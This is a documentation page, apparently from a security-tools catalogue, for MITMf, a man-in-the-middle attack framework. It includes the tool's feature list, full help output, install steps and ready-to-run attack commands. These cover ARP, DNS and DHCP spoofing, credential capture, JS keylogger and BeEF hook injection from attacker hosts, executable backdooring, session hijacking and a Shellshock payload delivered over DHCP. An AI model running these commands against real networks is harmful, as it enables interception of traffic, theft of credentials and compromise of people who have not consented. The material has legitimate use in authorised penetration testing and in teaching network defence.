MITMf
MITMf Description
MITMf – Framework for Man-In-The-Middle attacks.
Description
MITMf aims to provide a one-stop-shop for Man-In-The-Middle and network attacks while updating and improving existing attacks and techniques.
Originally built to address the significant shortcomings of other tools (e.g Ettercap, Mallory), it's been almost completely re-written from scratch to provide a modular and easily extendible framework that anyone can use to implement their own MITM attack.
Features
- The framework contains a built-in SMB, HTTP and DNS server that can be controlled and used by the various plugins, it also contains a modified version of the SSLStrip proxy that allows for HTTP modification and a partial HSTS bypass.
- As of version 0.9.8, MITMf supports active packet filtering and manipulation (basically what etterfilters did, only better), allowing users to modify any type of traffic or protocol.
- The configuration file can be edited on-the-fly while MITMf is running, the changes will be passed down through the framework: this allows you to tweak settings of plugins and servers while performing an attack.
- MITMf will capture FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (all supported protocols like HTTP, SMB, LDAP etc.) and Kerberos credentials by using Net-Creds, which is run on startup.
- Responder integration allows for LLMNR, NBT-NS and MDNS poisoning and WPAD rogue server support.
Active packet filtering/modification
You can now modify any packet/protocol that gets intercepted by MITMf using Scapy! (no more etterfilters! yay!)
For example, here's a stupid little filter that just changes the destination IP address of ICMP packets:
if packet.haslayer(ICMP): log.info('Got an ICMP packet!') packet.dst = '192.168.1.0'
- Use the packet variable to access the packet in a Scapy compatible format
- Use the data variable to access the raw packet data
Now to use the filter all we need to do is: python mitmf.py -F ~/filter.py
You will probably want to combine that with the Spoof plugin to actually intercept packets from someone else 😉
Note: you can modify filters on-the-fly without restarting MITMf!
Homepage: https://github.com/byt3bl33d3r/MITMf
Author: byt3bl33d3r
License: GPLv3
MITMf Help
usage: mitmf.py -i interface [mitmf options] [plugin name] [plugin options]
optional arguments: -h, --help show this help message and exit -v, --version show program's version number and exit MITMf: Options for MITMf --log-level {debug,info} Specify a log level [default: info] -i INTERFACE Interface to listen on -c CONFIG_FILE Specify config file to use -p, --preserve-cache Don't kill client/server caching -r READ_PCAP, --read-pcap READ_PCAP Parse specified pcap for credentials and exit -l PORT Port to listen on (default 10000) -f, --favicon Substitute a lock favicon on secure requests. -k, --killsessions Kill sessions in progress. -F FILTER, --filter FILTER Filter to apply to incoming traffic Upsidedownternet: Flips images 180 degrees --upsidedownternet Load plugin 'Upsidedownternet' AppCachePoison: Performs App Cache Poisoning attacks --appoison Load plugin 'AppCachePoison' Inject: Inject arbitrary content into HTML content --inject Load plugin 'Inject' --js-url JS_URL URL of the JS to inject --js-payload JS_PAYLOAD JS string to inject --js-file JS_FILE File containing JS to inject --html-url HTML_URL URL of the HTML to inject --html-payload HTML_PAYLOAD HTML string to inject --html-file HTML_FILE File containing HTML to inject --per-domain Inject once per domain per client. --rate-limit RATE_LIMIT Inject once every RATE_LIMIT seconds per client. --count-limit COUNT_LIMIT Inject only COUNT_LIMIT times per client. --white-ips IP Inject content ONLY for these ips (comma seperated) --black-ips IP DO NOT inject content for these ips (comma seperated) --white-domains DOMAINS Inject content ONLY for these domains (comma seperated) --black-domains DOMAINS DO NOT inject content for these domains (comma seperated) BrowserProfiler: Attempts to enumerate all browser plugins of connected clients --browserprofiler Load plugin 'BrowserProfiler' HTA Drive-By: Performs HTA drive-by attacks on clients --hta Load plugin 'HTA Drive-By' --text TEXT Text to display on notification bar --hta-app HTA_APP Path to HTA application [defaults to config/hta_driveby/flash_setup.hta] SSLstrip+: Enables SSLstrip+ for partial HSTS bypass --hsts Load plugin 'SSLstrip+' SMBTrap: Exploits the SMBTrap vulnerability on connected clients --smbtrap Load plugin 'SMBTrap' SMBAuth: Evoke SMB challenge-response auth attempts --smbauth Load plugin 'SMBAuth' JSKeylogger: Injects a javascript keylogger into clients webpages --jskeylogger Load plugin 'JSKeylogger' BrowserSniper: Performs drive-by attacks on clients with out-of-date browser plugins --browsersniper Load plugin 'BrowserSniper' FilePwn: Backdoor executables being sent over http using bdfactory --filepwn Load plugin 'FilePwn' Replace: Replace arbitrary content in HTML content --replace Load plugin 'Replace' ScreenShotter: Uses HTML5 Canvas to render an accurate screenshot of a clients browser --screen Load plugin 'ScreenShotter' --interval SECONDS Interval at which screenshots will be taken (default 10 seconds) ImageRandomizer: Replaces images with a random one from a specified directory --imgrand Load plugin 'ImageRandomizer' --img-dir DIRECTORY Directory with images Ferret-NG: Captures cookies and starts a proxy that will feed them to connected clients --ferretng Load plugin 'Ferret-NG' --port PORT Port to start Ferret-NG proxy on (default 10010) --load-cookies FILE Load cookies from a log file Responder: Poison LLMNR, NBT-NS and MDNS requests --responder Load plugin 'Responder' --analyze Allows you to see NBT-NS, BROWSER, LLMNR requests without poisoning --wredir Enables answers for netbios wredir suffix queries --nbtns Enables answers for netbios domain suffix queries --fingerprint Fingerprint hosts that issued an NBT-NS or LLMNR query --lm Force LM hashing downgrade for Windows XP/2003 and earlier --wpad Start the WPAD rogue proxy server --forcewpadauth Force NTLM/Basic authentication on wpad.dat file retrieval (might cause a login prompt) --basic Return a Basic HTTP authentication. If not set, an NTLM authentication will be returned Spoof: Redirect/Modify traffic using ICMP, ARP, DHCP or DNS --spoof Load plugin 'Spoof' --arp Redirect traffic using ARP spoofing --icmp Redirect traffic using ICMP redirects --dhcp Redirect traffic using DHCP offers --dns Proxy/Modify DNS queries --netmask NETMASK The netmask of the network --shellshock PAYLOAD Trigger the Shellshock vuln when spoofing DHCP, and execute specified command --gateway GATEWAY Specify the gateway IP --gatewaymac GATEWAYMAC Specify the gateway MAC [will auto resolve if ommited] --targets TARGETS Specify host/s to poison [if ommited will default to subnet] --ignore IGNORE Specify host/s not to poison --arpmode {rep,req} ARP Spoofing mode: replies (rep) or requests (req) [default: rep]
MITMf Usage Example
The most basic usage, starts the HTTP proxy SMB,DNS,HTTP servers and Net-Creds on interface enp3s0:
python mitmf.py -i enp3s0
ARP poison the whole subnet with the gateway at 192.168.1.1 using the Spoof plugin:
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1
Same as above + a WPAD rogue proxy server using the Responder plugin:
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --responder --wpad
ARP poison 192.168.1.16-45 and 192.168.0.1/24 with the gateway at 192.168.1.1:
python mitmf.py -i enp3s0 --spoof --arp --target 192.168.2.16-45,192.168.0.1/24 --gateway 192.168.1.1
Enable DNS spoofing while ARP poisoning (Domains to spoof are pulled from the config file):
python mitmf.py -i enp3s0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1
Enable LLMNR/NBTNS/MDNS spoofing:
python mitmf.py -i enp3s0 --responder --wredir --nbtns
Enable DHCP spoofing (the ip pool and subnet are pulled from the config file):
python mitmf.py -i enp3s0 --spoof --dhcp
Same as above with a ShellShock payload that will be executed if any client is vulnerable:
python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'
Inject an HTML IFrame using the Inject plugin:
python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com
Inject a JS script:
python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js
And much much more!
Of course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc..)
For a complete list of available options, just run
python mitmf.py --help
How to install MITMf
Installation on Kali Linux
apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libxml2-dev libxslt1-dev pip install virtualenvwrapper source /usr/local/bin/virtualenvwrapper.sh mkvirtualenv MITMf -p /usr/bin/python2.7 pip install requests[security] git clone https://github.com/byt3bl33d3r/MITMf cd MITMf && git submodule init && git submodule update --recursive pip install -r requirements.txt python mitmf.py --help
After reboot go to the directory with the installed program:
cd MITMf/
And:
source /usr/local/bin/virtualenvwrapper.sh mkvirtualenv MITMf -p /usr/bin/python2.7 python mitmf.py --help
Installation on BlackArch
pacman -S mitmf python2-setuptools libnetfilter_queue libpcap libjpeg-turbo capstone sudo pip install virtualenvwrapper source /usr/bin/virtualenvwrapper.sh mkvirtualenv MITMf -p /usr/bin/python2.7 pip install requests[security] cd /usr/share/mitmf/ pip install -r requirements.txt cd sudo python /usr/share/mitmf/mitmf.py --help
Edit your .bashrc or .zshrc file to source the virtualenvwrapper.sh script:
source /usr/bin/virtualenvwrapper.sh
Installation on Linux (Debian, Mint, Ubuntu)
sudo apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev python-pip git libxml2-dev libxslt1-dev libffi-dev libjpeg-dev libffi-dev libssl-dev libnfnetlink* libnetfilter-queue-dev sudo pip install capstone sudo pip install virtualenvwrapper sudo -s source /usr/local/bin/virtualenvwrapper.sh mkvirtualenv MITMf -p /usr/bin/python2.7 sudo pip install requests[security] git clone https://github.com/byt3bl33d3r/MITMf cd MITMf && git submodule init && git submodule update --recursive pip install -r requirements.txt python mitmf.py --help
After reboot go to the directory with the installed program:
cd MITMf/
And:
sudo -s source /usr/local/bin/virtualenvwrapper.sh mkvirtualenv MITMf -p /usr/bin/python2.7 python mitmf.py --help
MITMf Screenshots
The program is a command-line utility.
MITMf Tutorials
Coming soon…
Currently available plugins
- HTA Drive-By : Injects a fake update notification and prompts clients to download an HTA application
- SMBTrap : Exploits the 'SMB Trap' vulnerability on connected clients
- ScreenShotter : Uses HTML5 Canvas to render an accurate screenshot of a clients browser
- Responder : LLMNR, NBT-NS, WPAD and MDNS poisoner
- SSLstrip+ : Partially bypass HSTS
- Spoof : Redirect traffic using ARP, ICMP, DHCP or DNS spoofing
- BeEFAutorun : Autoruns BeEF modules based on a client's OS or browser type
- AppCachePoison : Performs HTML5 App-Cache poisoning attacks
- Ferret-NG : Transperently hijacks client sessions
- BrowserProfiler : Attempts to enumerate all browser plugins of connected clients
- FilePwn : Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy
- Inject : Inject arbitrary content into HTML content
- BrowserSniper : Performs drive-by attacks on clients with out-of-date browser plugins
- JSkeylogger : Injects a Javascript keylogger into a client's webpages
- Replace : Replace arbitrary content in HTML content
- SMBAuth : Evoke SMB challenge-response authentication attempts
- Upsidedownternet : Flips images 180 degrees
Comments are Closed